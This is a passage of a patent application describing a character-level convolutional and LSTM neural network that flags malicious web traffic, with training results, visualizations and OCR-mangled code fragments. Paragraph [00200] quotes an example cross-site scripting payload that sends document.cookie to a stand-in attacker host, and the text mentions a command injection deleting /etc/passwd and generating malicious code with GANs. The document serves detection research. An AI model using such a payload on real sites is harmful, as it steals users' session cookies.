[00105] Example code is also provided in (written in keras™, a python package) FIGS. 5-8, in screenshots 500, 600, 700, and 800. The system can be implemented, for example, using various processors and memory in the form of a neural network system. An input receiver can be used for receiving input text from one or more code input sources (e.g., system logs, security audits, real time input into text fields). [00106] A convolutional neural network unit may be used to provide the n convolutional layers and is configured for receiving the input text and processing the input text through the various convolutional layers (for example, having various different parameters that may aid in processing, such as stride length). [00107] A recurrent neural network unit is provided having one or more long short term memory layers, the recurrent neural network unit configured to perform pattern recognition, and a classification unit may be utilized to receive the output data from the recurrent neural network unit to perform a determination of whether the input text or portions of the input text are malicious code or benign code. This can be used, for example, in the form of a real-time input verification system, a security auditing system (e.g., run nightly) to validate code, etc., and these applications may be dependent on how long processing takes to accomplish and the amount of resources available to conduct the processing. The neural network system of claim wherein the convolutional neural network unit is configured to perform dropout and batch normalization to intermediate output generated at each of the one or more convolutional layers.

Example Implementation

[00108] A multi-step machine learning neural network structure may be provided, as shown in in some embodiments on FIG. 3A and FIG. 3B. Rather than a heuristic/rule-based approach to malicious code detection, Applicants has built a neural network that can detect new attacks that, in some embodiments, would not be caught or would have less likelihood of being caught by a traditional approach without modifying a detection rule.

[00109] Referring to FIG. 3A, an illustration 300A of the full model for the malicious code neural network is shown, whereby a SQL injection (a) is read into a convolutional layer (b) which picks up patterns in the text. These features are then regularized via batch normalization and dropout (c). Next they pass through the recurrent layer (d), which remembers the sequence of patterns, and generates new features. Finally these features are passed through the classification layer (e) which labels the SQLi as malicious. [00110] In FIG. 3B, a flow chart 300B showing example inputs being received, multiple iterations of the convolution / batch normalization process, providing into a bidirectional LSTM, leading to a single output, are provided. In FIG. 3B, the sizes and dimensionality of the inputs and outputs are shown. [00111] An example block schematic is provided at FIG. 3C, showing example modules and units that may be implemented in software, hardware, embedded firmware, or a combination thereof. There may be more, different, alternate modules or units, and those shown are by way of example only.

[00112] The system 10 is configured to receive, at input processor and feature vector generator 104, as input, code snippets (e.g., a portion of raw web traffic in plain text, such as any web traffic such as what is shown in FIG. 2). Web traffic can be used, but in some embodiments, the system and methods can be applied to various other types of code (e.g., Javascript™). For example, the code snippets may be provided by a text editor or other coding environment (e.g., real-time or near-real time, on writing of code or compilation or debugging).

[00113] The system is configured to perform a series of processing steps on that data as shown in FIG. 3A. The neural network analyzes the input on a per-character basis, not words or commands. The input processor and feature vector generator 104 generates a feature vector extracted from code inputs or segments, received across a network (e.g., the Internet or an intranet, or point-to-point). In some embodiments, the system 10 resides on a computing device itself, and accordingly, there may be no network 150 (e.g., residing all on the same integrated circuit), or network 150 is a message bus infrastructure.

[00114] The neural network, as described in various examples below, includes one or more neural network units which are combinations of hardware and software that include data storage elements, storing weights, connections, computing nodes representing different layers (e.g., input layers, hidden layers, output layers), error values, activation functions, among others. Underlying computing elements of neural network units, including hardware and/or software implement the layers and connections of the neural network, and these elements may include data storage, data registers, pointers, data structures, data memories, etc. The neural network data may be stored, for example, on a data storage, such as database 150.

[00115] The system 10 can, for example interoperate with a real or near real-time text editor 102, which a developer or programmer may be writing code into. The text editor 102 may submit code segments for processing, and the neural network 20 is utilized to conduct real-time classifications of the code to provide dynamic feedback to the user by way of the text editor 102, through one or more visual interface elements controlled by visualization controller 114, for example, using an overlay engine 116. The visual interface elements for control may include text / comment bubbles, changing of characteristics of text (font size, color, attributes), among others. As shown in various examples within the figures, an example visual interface element for controlling during rendering of the text on the text editor 102 includes changing emphasis on various words by way of changing text color (e.g., lighter signifies less risk, darker signifies more risk). Other visualizations are possible. [001 16] In another example, the system 10 receives code being received, executed or evaluated, or scanned at a computing system. These code segments are then provided by neural network 20, and similarly, the neural network provides feedback based on classifications of the code segments or portions thereof as malicious or benign.

[001 17] In some embodiments, the classification layer 112 is configured to output risk profiles in the form of an aggregated data structure for downstream risk processing. For example, a data breach may occur, and the classifications generated during the original development of the code may be utilized to refine neural network 20, or to identify root causes of the vulnerabilities (e.g., poor coding practices). In some embodiments, the classifications are analyzed using another neural network to identify common code features where a training set of breaches and their underlying code are provided as inputs.

[00118] Alerts, alarms or other types of notifications may be generated to inform one or more users or downstream systems that there may be malicious code being processed by the neural network. Signals may be generated, for example, to automatically block code from executing or to quarantine the code from having further access or impact.

[00119] For example, code segments classified as malicious may be prevented from execution and stored in a quarantined buffer memory location or storage for further review. On further review, re-classification may occur, and where a false positive, or a false negative is encountered, the system 10 may receive feedback in the form of one or more training sets to re-tune neural network 20.

[00120] Following through FIG. 3B, the input layer takes any text (e.g., character strings) or human input. The Convolution layer frames the text with a filter. This result is normalized, then a dropout layer randomly switches off some selection of filters/neurons during training to prevent the neural network from over-relying on some filters more than others.

[00121] Inputs can be received various formats by input processor and feature vector generator 104. For example, a step in the NLP approach is choosing an appropriate technique to couple the text to the algorithm. This may involve putting together a corpus of common words (the "bag of words" model), tagging nouns, verbs and prepositions (part of speech), or even more advanced techniques such as embedding the corpus into a lower- dimensional vector space. One technique which has shown surprising success is to simply read text character by character.

[00122] Through training, the structure of words, sentences and even paragraphs can be predicted. This approach is especially suitable for code classification, where even the correct type of punctuation used is vital. In contrast, word-based approaches often drop punctuation, spacing and special characters. Character-level encoding also results in a reduced vocabulary size (81 characters including lower and upper case, numbers and symbols). The downside of this approach is that it vastly increases the sequence length being fed into a recurrent neural network. However, this issue is mitigated by the introduction of convolutional layers. [00123] In order to input the code into the first layer of the neural network, each character is first mapped to an 81 dimensional vector by input processor and feature vector generator 104, where all but one of the elements is set to zero.

[00124] The remaining unique element is of unit value, representing that characters location in the vocabulary. This is a process known as one-hot encoding. The next step is ensuring that all the samples have the same sequence length. This can be achieved by setting the sequence dimension in each sample to be the length of the longest sequence, and padding any remainder with empty vectors. The result is a |T| χ |V| sparse matrix, where |T| and |V| represent the length of the sequence and vocabulary respectively. [00125] The next step is to feed this matrix into the first layer of the neural network 20: the convolutional layer, provided by convolution layer engine 108 (which may have one or more convolutional layers).

[00126] Convolutional neural networks (CNNs) are especially robust at detecting patterns, even under translation, rotation or re-scaling. In some embodiments of the model, the convolution layer engine 108 utilizes one or more one-dimensional (1 D) CNNs, where the dimension in this case is the sequence of text.

[00127] A CNN layer is provided by convolution layer engine 108, made up of a set of filters, each with length d, which scan across a matrix of information, with

some stride s. [00128] In this example, the matrix is a sequence X(t) of T |V|-dimensional vectors As the CNN filter only scans in one dimension, it too is a matrix with dimensions

[00129] After convolving, a vector Ft' of length |F| is generated where each element is defined as: [00130]

[00131] Here the prime notation is used in t' to denote the possibility that the resulting sequence length may be shorter than length T , and c is an offset constant. The element- wise product of the filter f" and the sequence of text X(t) are passed through a non-linear activation function <j>, which outputs a single scalar.

[00132] In an example, a rectified linear unit (ReLu) can be utilized, configured to discard out any negative values and retains all positive values. This activation function can be advantageous for two reasons: it is computationally cheaper than other non- linear functions, and it doesn't suffer as much from the vanishing gradient problem. [00133] The resulting vector of activated values Ft' is then passed on to the next layer.

[00134] The following layer may be another CNN layer, with its own receptive field d and its own stride value s , or it may be a different form of neural network, such as a recurrent layer to help get a better sense of a 1 D CNN in operation, FIG. 1A illustrates a single filter, with receptive field d = 3 and stride s = 2, scanning over a string of text for 3 steps. [00135] For improved compression, a convolution layer can be run iteratively by the convolution layer engine 108 with an increased stride which effectively reduces the size of the data being analyzed. By the time the system has completed the third convolution layer in FIG. 3C, for example, the size of the data is 1/4 of the original size. Other numbers of convolution iterations are possible. [00136] This data is provided as an input into a bidirectional recurrent layer, called a Long Short Term Memory layer (LSTM) 110.

[00137] Recurrent Neural Networks (RNNs) are useful. Specifically, gated RNNs such as the long-term short-term memory (LSTM) network 110 are employed to remember far back into the history of a sequence while processing the latest value. The following is the output of a single cell (the hidden state of the LSTM) at a given time step:

[00139] where x, is a single time step from a sequence (x 0 , . . . , x T ) and h 0 ≡ 0. The LSTM 110 builds upon the basic RNN by adding gated memory. The final output of an LSTM for a given time step x t is

[00143]

[00144]

[00145] The memory cell is composed of two key gates, the input and forget gate, respectively:

[00146] [00147]

[00148] In all of the above notation W and Uf are weight matrices, b are bias vectors and σ is the sigmoid function:

[00149]

[00150] The purpose of the input and forget gates is to provide more control on what the cell remembers. Through training, it can assign a level of importance to new information as well as consider erasing non-relevant past information.

[00151] RNNs are configured to remember information from the future, in that some cells work backwards from the end of a sequence. The results for each time step can then be merged at the output, resulting in what is known as a bi-directional RNN.

[00152] Techniques and approaches for regularization and re-parameterization are described below. One of the biggest challenges of deep learning is ensuring that a neural network is generalizable. That is, when faced with a previously unseen test set, the neural network will perform as well as it did in training. Neural networks that do not perform well with the test set but do with the training set are said to be over-fitted to the training data. In order to prevent this from happening, regularization is a reliable approach.

[00153] Dropout is a technique than randomly switches off hidden units during training. The technique forces the hidden units to be effective in many contexts. [00154] This a form of ensemble learning, and it is effective at preventing over-fitting. In the case of CNNs, dropout is applied to the filters, while in the case of RNNs, dropout has two values: one is applied to the input sequences, while the other is applied to the memory cells. As with all hyper-parameters, the proportion of neurons that are switched off must be determined by careful selection over multiple training sessions. [00155] Another helpful technique is batch normalization, conducted by batch normalization engine 106. Rather than prevent over-fitting, it helps speed up training and can improve accuracy. Neural networks 20 can be trained batch-wise, meaning that a small portion of the training set is passed through the network, before updating the weights.

[00156] However, data between batches can differ wildly, causing the weights of the network to struggle to fit to the right values. The batch normalization engine 106 is configured to first scale and shift each batch X, and then forces each batch to the same shared mean (β) and variance (γ). [00157]

[00158] The result is that data is more standardized, whilst preserving the expressive power of the neural network.

[00159] The following paragraphs describe training. The purpose of supervised learning is to tune the weights of a given neural network to just the right values, so that when given some input as part of regression problem, be it linear or logistic, it can correctly predict the right output. In order to do this, one needs to devise a loss function that measures the quality of these weights by comparing the predicted values to the ground truth.

[00160] In an example embodiment, the system is configured to utilize a binary cross- entropy measure.

[00161] represent the probability distribution of the ground truth, while q is that of the model. The loss function L (Θ) for a given set of parameters Θ is then given by:

[00162] [00163] Next, the system 10 is configured to minimize this loss with respect to the parameters. Naively, one might try to solve this analytically, but for the number of parameters and training samples typically encountered in machine learning, this is not feasible.

[00164] Instead the weights are updated via stochastic gradient descent (SGD): [00165]

where η is the learning rate. A modified form SGD called Adam™ can be used which has adaptive learning rates.

[00166] The output of that is then classified by classification layer 112 as malicious or not, and the result can be provided in a visualization interface, e.g., configured to show text as visualized in FIG. 4. Example source code is provided in FIGS. 5-8, in screenshots 500, 600, 700, and 800.

[00167] FIGS. 9 and 10 are further example text snippets 900 and 1000 that may be used as training data.

[00168] FIG. 15 includes pseudo-code 1500 that may be used, for example, to invoke the neural network of some embodiments, including example parameters for the various layers.

Implementation Example and Experimental Results - 1

[00169] Applicants trained a neural network on a computing device having a GTX 1060™ video card, a Core i7™ processor & 16 GB of random access memory. The experimental system was trained on ~50,000 samples over 10 epochs, each epoch taking approximately 250 seconds.

[00170] As illustrated in the chart 1000 of FIG. 10, the trained system was able to achieve over 98% in accuracy, precision and recall on a test batch of 5000 samples. Given that most threats are not one-time attacks but a series of benign requests followed by an attack, the system may be configured, in some embodiments, to scan over the full (or a substantially large portion of) history of requests from a client.

[00171] In further embodiments, the system and method may be configured to generate malicious code using a reverse approach. A good candidate for generation of code is an attention model (e.g., as shown in FIG. 18 where attention is placed on various words based on text block 1800). For example, in order to improve upon enterprise applications like AppScan™, malicious code could be generated. Code generated by an LSTM looks like code, but in reality is nonsense. Actual working code could be generated by reinforcement learning, or perhaps even using a Generative Adversarial Network (GAN).

[00172] Using a linear regression approach, Applicants were able to obtain an accuracy of 89%, similar to the heuristic method. [00173] A basic example of a feed-forward network, the vanilla neural network, were able to obtain an accuracy of 92%. Using a single convolutional layer only, the system obtained an accuracy of 93%. Applicants hypothesize that it was not computationally feasible to try out a single LSTM only, as the CNN layer reduces the dimensionality.

[00174] Finally, without any of the regularization techniques, such as dropout and batch normalization, Applicants were able to obtain an accuracy of 97%.

[00175] Improvements to the model relating to an improved metric approach yielded a 99% accuracy given a specific set of test inputs.

Implementation Example and Experimental Results - 2

[00176] A second implementation was conducted on a second example neural network, trained on a laptop with a 2.6 Ghz quad- core intel Ί7 processor, 16 GB of memory and a GeForce GTX 1060. The code was implemented in Keras [with a GPU-enabled Ten sorflow framework. For the model selected below, each training epoch took approximately 100 seconds to run, with 10 epochs run in total.

[00177] The final model selected was an optimal balance of depth, capacity and generalizability. After encoding the text to one-hot vectors, the data was fed into the first of three convolutional layers. Each convolutional layer had a receptive field d = 7. This value was sufficiently large for most words, while not so large that any signal could be lost within the receptive field. Each CNN had 16 filters in total. The first CNN layer had a stride step of s = 1 , while the second and third had a stride step of s = 2. This effectively quartered the sequence length by the time it had reached the RNN. [00178] After each of the first two CNN layers, batch normalization and dropout (with a ratio of .1) were applied. The next layer was the bidirectional LSTM, which had 32 cells, and had dropout ratios of 0.4 and 0.15 to the input and memory respectively. Finally the classification layer was a simple sigmoid function of the LSTM output. Training was done batch-wise, with a batch size of 384 samples, over ten epochs in total. The loss function used was binary cross-entropy and the optimization approach employed was Adam™ with a learning rate of 0.002. In Table 1 , Applicants compare the system to various different versions and their performance as measured by accuracy.

[00179] TABLE 1 :

Our Model

[00180] The data set employed was a collection of 50,000 server logs, obtained from various security audits. The data set is split into two classes of roughly the same size, malicious and benign. Amongst the malicious class are examples of SQL injection (SQLi), cross-site scripting (XSS), path traversal, information retrieval with malicious intent and double-encoding. A random 10% of the dataset was set aside for testing, while the rest was used in training the neural network. The remaining training set was randomly split 80/20 into training and validation sets during each epoch. [00181] When the test set was applied to the final model, an accuracy of 99% with similar values of 99% for precision and recall.

[00182] Precision is defined as

[00183] while recall is defined as

[00184]

[00185] On the same hardware that the model was trained on, 5000 training samples were processed in just over 3 seconds. The model itself is easily scalable to speeds necessary for enterprise deployment. For example on similar hardware, but with double the GPU memory, the sample set was processed in under 3 seconds. The model accuracy compares extremely favorably with a human expert tester, who got an accuracy of 99% on a test set of 1000 samples in under 30 minutes.

[00186] An open source web application penetration testing software, OWASP Zed Attack Proxy (ZAP)™, was then tested on the same dataset. In this case both the training and test portions were used.

[00187] Each of these three approaches are compared in Table 2. Note that despite the fast speed of the light-weight heuristic approach, its rate of detection is still nearly half that of the system of some embodiments. [00188] TABLE 2: Comparison table of the neural network 20 with a human and heuristic benchmark. Speed is in units of samples per second.

Visualization [00189] In order to interpret how the algorithm makes its decisions, it is important to understand how the neural network is processing. To this end, in some embodiments, a visualization is rendered that illustrates the similarity between the thought processes of humans and neural networks.

[00190] The following figures are direct representations of the values assigned by various hidden cells to each letter in a sequence; the darker the font, the more important that letter is to the hidden unit.

[00191] The "thought-process" of the neural network is provided in the form of a visualization 400, at FIG. 4. FIG. 4 illustrates a server log where the neural network has identified suspicious snippets of code 402. The visualization demonstrates the feature importance of a malicious sample after it has passed through the bi-directional LSTM.

[00192] In FIG. 4, the SQLi attack is illustrated with a bold text 402 compared to the remaining text. This indicates that the system identifies and/or determines this text 402 to be relevant in deciding that the code is malicious. More specifically, FIG. 4 is a visualization of a single cell of the LSTM layer, for a given sample. [00193] FIGS. 16 and 17 illustrate sample visualization outputs 1600 and 1700 that may be provided by the system. FIG. 16 illustrates an early identification of malicious code, while FIG. 17 shows a more refined identification of malicious code. As depicted in FIGS. 16 and 17, differing visual features may be imposed on the text (e.g., to highlight malicious code or hide benign code).

[00194] FIGS. 20A-20C shows an example of a SQL injection, being processed at different layers of the neural network. The full injection reads as:

[00196] The three separate images 2000A, 2000B, and 2000C correspond to a hidden unit from layers 1 (CNN), 3 (CNN) and 4 (RNN) respectively.

[00197] Note that not all the highlighted characters may be relevant, especially in hidden units from the first layer. In the first layer, some of the relevant text is selected, but there is also a great deal of irrelevant information selected. In the final hidden layer however, more sophisticated representations are possible, and the hidden unit is able to hone in on the precise string of malicious code, while ignoring irrelevant code. The reader may notice a slight crescendo/decrescendo on either side of the injection; this is an indication of the RNN getting excited, and then calming down, as it runs through the sequence.

[00198] Another key point is that the words that are SQL commands are given greater importance by the neural network. FIGS. 20A-20C illustrate that with increased depth in a neural network, one can obtain increased representational power.

[00199] The remaining figures will focus only on units from the final hidden layer, and serve not only to demonstrate the attention-like mechanism of the neural network, but also the scope of its detection capabilities.

[00200] The next example 2100 shown in FIG. 21 is a malicious attack that was double- encoded, designed to get past systems that only decode data once. The full attack actually reads "user name =< script > document .location = 'http://attackerhost.example /cgi - bin/cookiesteal .cgi?'+ document .cookie < /script >?". In this case, the neural network 20 has learned to pick up the fractal-like pattern of double url-encoding. This approach is essentially a slightly more sophisticated version of the attack shown in FIG. 22. In FIG. 22, illustration 2200 shows the malicious agent attempting a persistent cross-site scripting (XSS) attack, where any visitors to the site will have their session retained and redirected to the malicious agents site and all of their cookie information stolen. This enables further, more personalized attacks in the future.

[00201] The system 10 can also detect session hijackings, where a malicious agent intercepts a trusted client's cookie, injects their own, and gains control over the client's login session; complete with all login privileges. FIG. 23 illustrates such an attack 2300 being detected. [00202] Another curious approach is a form of command injection. In the illustration 2400 of FIG. 24, the hidden unit is picking up on an attempt to remove any password requirements by deleting the /etc/passwd directory. Again, as with the previous examples, the font is darkest (most important) on the key parts of the malicious string.

[00203] Finally, it is interesting, and also instructive, to examine one of the cases where the system 10 fails. In the illustration 2500 of FIG. 25, the system is presented a malicious data probe that was incorrectly marked as benign by the approach. In this case the individual actions of the malicious agent are not obviously untoward.

[00204] However, when viewed collectively, it is clear that the agent is probing the system for weaknesses via the types of errors they receive. [00205] The false negative can then be understood in the sense that this probe would appear very close to a genuine login attempt within the vector space of samples created by the neural network 10. More training examples of such probes may remedy this. It is worth noting that despite misclassifying the sample, this hidden unit was investigating in the correct location. [00206] The approach outlined in this work focused on analyzing server logs for malicious code in an independent fashion. In other words, the full history of an individual's server requests are not being considered. Given that many malicious attacks are preceded by a pattern of reconnaissance probes, it would be interesting to expand the scope of the approach to take this into account. However, due to massive increase in sequence length, this would require new, more capable methodologies. Among the possible solutions are attention models. For example the hierarchical attention model proposed by Yang et al. It's possible that such a model could then detect malicious probes and shut out attacks before they even attempt to deploy any damaging payload. It's also possible that, by framing an attack with its prior probes, false negatives like the one in figure 8 are less likely to occur.

[00207] The recent boom in deep learning has born fruitful outcomes for Natural Language Processing. In turn, using such NLP techniques in cybersecurity proves to be remarkably effective. Applicants present an approach with accuracy, precision and recall levels that are indistinguishable from those of a human expert.

[00208] The neural net- work successfully detected and highlighted attacks from a broad variety of complex techniques; cross-site scripting, SQL injection, command injection, session hijacking and double-encoded attacks, to name a few. In contrast, the open-source heuristic approach performed significantly worse on the same dataset.

[00209] Moreover, the neural network performs these tasks at a rate that is orders of magnitudes faster than that the other two benchmarks.

[00210] The fact that the approach is able to achieve all this, and infer full coherent malicious phrases after being fed merely a sequence of letters, is all the more surprising. While the approach taken here is using a supervised learning algorithm, other deep learning approaches could be effective. For example, one could try an unsupervised learning approach using auto-encoders to perform outlier detection. In any case, the key contribution of deep learning is that it is a form of representation learning, meaning that a neural network can learn and extract highly non-linear features of data. This non-linearity is essential; one cannot linearly discriminate between code when tricks such as double-encoding are employed. [0021 1] As artificial intelligence continues to advance in making complex reasoning, it is inevitable that it will play a larger role in cybersecurity.

[00212] Structured prediction is possible. For example, there already exists a method of generating accurate-looking images by drawing from a probability distribution of training images. This method, known as a generative adversarial network (GAN), can generate human faces indistinguishable from genuine ones. It is contemplated that it is possible to utilize a GAN to generate malicious code Already there exist algorithms that predict whole passages when presented with a single phrase or letter. While these generated phrases can have accurate spelling, vocabulary, punctuation and even grammar, they mostly veer into the surreal and incoherent. This is partially due to the fact that text is discrete, and typically deep learning requires differentiable data if it is going to generate it.

[00213] FIG. 19 is a schematic diagram of computing device 1900, exemplary of an embodiment. As depicted, computing device 1900 includes at least one processor 1902, memory 1904, at least one I/O interface 1906, and at least one network interface 1908. [00214] Each processor 1902 may be, for example, microprocessors or microcontrollers, a digital signal processing (DSP) processor, an integrated circuit, a field programmable gate array (FPGA), a reconfigurable processor, a programmable read-only memory (PROM), or combinations thereof.

[00215] Memory 1904 may include a suitable combination of computer memory that is located either internally or externally.

[00216] Each I/O interface 1906 enables computing device 1900 to interconnect with one or more input devices, such as a keyboard, mouse, camera, touch screen and a microphone, or with one or more output devices such as a display screen and a speaker.

[00217] Each network interface 1908 enables computing device 1900 to communicate with other components, to exchange data with other components, to access and connect to network resources, to serve applications, and perform other computing applications by connecting to a network (or multiple networks) capable of carrying data including the Internet, Ethernet, plain old telephone service (POTS) line, public switch telephone network (PSTN), integrated services digital network (ISDN), digital subscriber line (DSL), coaxial cable, fiber optics, satellite, mobile, wireless (e.g. Wi-Fi, WiMAX), SS7 signaling network, fixed line, local area network, wide area network, and others, including combinations of these. Computing devices 1900 may serve one user or multiple users.

[00218] The embodiments of the devices, systems and methods described herein may be implemented in a combination of both hardware and software. These embodiments may be implemented on programmable computers, each computer including at least one processor, a data storage system (including volatile memory or non-volatile memory or other data storage elements or a combination thereof), and at least one communication interface.

[00219] Program code is applied to input data to perform the functions described herein and to generate output information. The output information is applied to one or more output devices. In some embodiments, the communication interface may be a network communication interface. In embodiments in which elements may be combined, the communication interface may be a software communication interface, such as those for inter-process communication. In still other embodiments, there may be a combination of communication interfaces implemented as hardware, software, and combination thereof.

[00220] Throughout the foregoing discussion, numerous references will be made regarding servers, services, interfaces, portals, platforms, or other systems formed from computing devices. It should be appreciated that the use of such terms is deemed to represent one or more computing devices having at least one processor configured to execute software instructions stored on a computer readable tangible, non-transitory medium. For example, a server can include one or more computers operating as a web server, database server, or other type of computer server in a manner to fulfill described roles, responsibilities, or functions.

[00221] The term "connected" or "coupled to" may include both direct coupling (in which two elements that are coupled to each other contact each other) and indirect coupling (in which at least one additional element is located between the two elements). [00222] The technical solution of embodiments may be in the form of a software product. The software product may be stored in a non-volatile or non-transitory storage medium, which can be a compact disk read-only memory (CD-ROM), a USB flash disk, or a removable hard disk. The software product includes a number of instructions that enable a computer device (personal computer, server, or network device) to execute the methods provided by the embodiments.

[00223] The embodiments described herein are implemented by physical computer hardware. The embodiments described herein provide useful physical machines and particularly configured computer hardware arrangements. The embodiments described herein are directed to electronic machines and methods implemented by electronic machines adapted for processing and transforming electromagnetic signals which represent various types of information.

[00224] The embodiments described herein pervasively and integrally relate to machines, and their uses; and the embodiments described herein have no meaning or practical applicability outside their use with computer hardware, machines, and various hardware components.

[00225] Substituting the physical hardware particularly configured to implement various acts for non-physical hardware, using mental steps for example, may substantially affect the way the embodiments work. Such computer hardware limitations are clearly essential elements of the embodiments described herein, and they cannot be omitted or substituted for mental means without having a material effect on the operation and structure of the embodiments described herein. The computer hardware is essential to implement the various embodiments described herein and is not merely used to perform steps expeditiously and in an efficient manner. [00226] Although the embodiments have been described in detail, it should be understood that various changes, substitutions and alterations can be made herein. [00227] Moreover, the scope of the present application is not intended to be limited to the particular embodiments of the process, machine, manufacture, composition of matter, means, methods and steps described in the specification. As one of ordinary skill in the art will readily appreciate from the disclosure, processes, machines, manufacture, compositions of matter, means, methods, or steps, presently existing or later to be developed, that perform substantially the same function or achieve substantially the same result as the corresponding embodiments described herein may be utilized.

[00228] As can be understood, the examples described above and illustrated are intended to be exemplary only. Example Code

[00229] Careful selection of parameters is an important factor. Factors for tuning, for example, include the number of layers to be implemented (e.g., the convolutional layers were used to reduce the sequence length and find patterns), whereby increased layers may help ease the computational burden, but too many layers would reduce the overall accuracy. The number of filters in the convolutional layers needs to be selected, as too few would cause the model to underfit, and further, too many would cause it to overfit, as both would lead to cause a drop in accuracy at test time.

[00230] The kernel_size is chosen so that it would encapsulate the majority of a word as it scanned across the text, and the activation type is chosen to help the network learn various types of parameters. In this example, reLu was chosen (e.g., over tanh). Batch normalization was chosen to help speed up training and improve test accuracy, and drop out was introduced to prevent overfitting. The value was carefully chosen, much like the number of filters.

[00231] The recurrent layer was parameterized with an optimal level of dropout and optimal number of cells, and a bi-directional LSTM was chosen as the LSTM includes a long term memory component, which is of more use than a regular Recurrent Neural Network, and bidirectional was chosen to adapt to attacks can be in at any point in the sequence.

Text Input

K.leaming_phase()], [model. layers[Layernum]. output]) layer_output = np.array(layerOutput([x,0]))

for stridestep in range(layer_output.shape[2]):

FeaturedX[stridestep*subsample:stridestep*subsample+sampl elength]=np. maximum (FeaturedX[stridestep*subsample:stridestep*subsample+samplel ength],(layer_output

[0][0][stridestep][FilterNum])*np.ones([samplelength,1]))

FeaturedX/= max(FeaturedX+1e-5) return FeaturedX

Colour Mapping

def hex_to_RGB(hex):

return [int(hex[i:i+2], 16) for i in range(1 ,6,2)]

# def ShadedText(x,filterVec,start_hex="#FFFFFF", finish_hex= M #002888", n=10): def ShadedText(x,filterVec,start_hex= ,, #000000", finish_hex="#ff0000", n=10):

Example Output